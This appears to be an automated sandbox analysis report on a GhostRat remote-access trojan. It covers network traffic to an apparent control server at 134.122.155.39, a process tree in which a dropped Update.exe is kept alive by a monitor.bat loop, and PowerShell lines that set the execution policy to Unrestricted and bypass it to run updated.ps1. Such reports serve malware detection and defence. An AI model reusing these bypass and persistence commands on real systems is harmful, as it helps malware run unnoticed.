                                                                                          Jan 6, 2025 17:48:54.141544104 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141555071 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141571045 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141581059 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141606092 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141855955 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141872883 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141885042 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141895056 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.141911030 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.141947031 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:54.142081976 CET1885249900134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:54.142119884 CET4990018852192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:56.315366030 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:56.321799040 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:56.322829008 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:56.323251963 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:56.328012943 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.184293985 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.184817076 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.189744949 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.189759016 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.189768076 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487790108 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487813950 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487826109 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487847090 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487858057 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487869024 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487869024 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.487914085 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.487926960 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487936974 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487951040 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487963915 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.487976074 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.488001108 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.492738962 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.492755890 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.492786884 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.573523998 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.696852922 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.696886063 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.696897984 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.696909904 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.696921110 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697026968 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.697247982 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697261095 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697290897 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.697586060 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697597027 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697608948 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697618961 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697629929 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.697861910 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.698385000 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.698409081 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.698421955 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.698437929 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.698448896 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.698462009 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.698503971 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.699285030 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.699302912 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.699321032 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.699330091 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.699331999 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.699343920 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.699369907 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.699405909 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.905744076 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.905766964 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.905781984 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.905842066 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906533957 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906547070 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906560898 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906574011 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906588078 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906591892 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906600952 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906627893 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906702042 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906716108 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906728983 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906737089 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906745911 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906761885 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906917095 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:48:57.906951904 CET4992215091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:48:57.906985998 CET1509149922134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.531795979 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.843673944 CET1509149940134.122.155.39192.168.2.4
                                                                                          Jan 6, 2025 17:50:21.886225939 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:21.910900116 CET4994015091192.168.2.4134.122.155.39
                                                                                          Jan 6, 2025 17:50:21.915715933 CET1509149940134.122.155.39192.168.2.4

                                                                                          Target ID:0
                                                                                          Start time:11:47:31
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ErbgterT2R.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:73'541'183 bytes
                                                                                          MD5 hash:14DFEC5B51C4D87EACAB495AD216EB7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:11:47:41
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          Imagebase:0x20000
                                                                                          File size:395'368 bytes
                                                                                          MD5 hash:FB325C945A08D06FE91681179BDCCC66
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3080736947.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3409527868.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564258911.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3409583001.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2585718270.0000000004721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3251923275.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2762513988.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:11:48:51
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:11:48:51
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:11
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:16
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:17
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:18
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                          Imagebase:0x520000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:19
                                                                                          Start time:11:48:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                          Imagebase:0x520000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:20
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:21
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:22
                                                                                          Start time:11:49:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:23
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:24
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:25
                                                                                          Start time:11:49:52
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:26
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:tasklist /FI "IMAGENAME eq Update.exe"
                                                                                          Imagebase:0x2d0000
                                                                                          File size:79'360 bytes
                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:27
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:findstr /I "Update.exe"
                                                                                          Imagebase:0x200000
                                                                                          File size:29'696 bytes
                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:28
                                                                                          Start time:11:50:22
                                                                                          Start date:06/01/2025
                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:timeout /t 30 /nobreak
                                                                                          Imagebase:0x300000
                                                                                          File size:25'088 bytes
                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false


                                                                                            Execution Graph

                                                                                            Execution Coverage:18%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:26.8%
                                                                                            Total number of Nodes:1423
                                                                                            Total number of Limit Nodes:15
                                                                                            execution_graph: the call graph is an interactive rendering whose node and edge data (function addresses and the API calls reached from each node) does not survive as readable text. The API calls named in the graph nodes include VirtualAlloc, VirtualFree, CreateFileW, ReadFile, GetFileAttributesW, SetFileAttributesW, DeleteFileW, RemoveDirectoryW, FindFirstFileW, FindNextFileW, CreateDirectoryW, GetLocalTime, SystemTimeToFileTime, CompareFileTime, FormatMessageW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CoInitialize, SysAllocString, VariantClear, GetKeyState, ShellExecuteExW, WaitForSingleObject, CreateWindowExW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, MessageBoxA, InitializeCriticalSection and the CRT startup routines (__getmainargs, _initterm, _controlfp), among others.
9451 401429 ??2@YAPAXI ??3@YAXPAX 9451->9453 9453->9448 9453->9450 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9149 9460->9151 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9150 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9208 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 
